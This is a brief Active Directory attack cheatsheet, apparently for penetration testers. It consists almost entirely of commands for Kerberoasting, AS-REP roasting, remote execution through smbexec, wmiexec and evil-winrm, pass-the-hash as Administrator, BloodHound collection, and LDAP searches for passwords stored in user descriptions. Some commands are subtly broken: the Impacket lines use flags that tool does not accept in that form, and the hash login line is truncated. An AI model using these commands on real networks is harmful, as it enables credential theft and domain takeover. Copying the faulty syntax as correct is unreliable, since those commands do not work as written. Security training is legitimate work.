AD user to pivoting

This cheatsheet gathers common methods to pivot and escalate privileges in Active Directory environments when you control a user or service account but cannot authenticate via services such as RDP or WinRM.

# Kerberoast - Get SPN account
GetUserSPNs.py -request domain.lan/user:'password' -dc-ip 192.168.1.10

# AS-REP roasting
GetNPUsers.py domain.lan/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass

Network scan authenticated

nmap -v -sS -sC -sV -p- --script "smb*,msrpc*,rdp-*" \
  --script-args "smbusername=user smbpassword='password'" $IP

RCE via protocol (SMB, WMI, WinRM)

# smbexec
impacket-smbexec [[domain/]username[:password]@]target

impacket-smbexec -u user -p 'password' -d Domain $IP

# wmiexec
impacket-wmiexec [[domain/]username[:password]@]target

impacket-wmiexec -u user -p 'password' -d Domain $IP

# evil-winrm
evil-winrm -i $IP -u user -p 'password'

# Auth with admin hash (get via secretdump by example)
sudo evil-winrm -u "Administrator" -H <administator_hash> -i $

AD Recon via LDAP

# bloodhound-python
bloodhound-python -u user -p 'password' -d domain.lan \
  -dc 192.168.1.10 -c All

# ldapsearch example
ldapsearch -x -H ldap://192.168.1.10 \
  -D "domain\\user" -w 'password' -b "DC=domain,DC=lan"

# Search for potential passwords in user descriptions
ldapsearch -x -H ldap://$IP -D 'user@domain.lan' -w 'password' \
  -b 'dc=domain,dc=lan' '(&(objectClass=user)(description=*))' \
  sAMAccountName description | grep -Ei 'pass|mdp|motdepasse|forgot'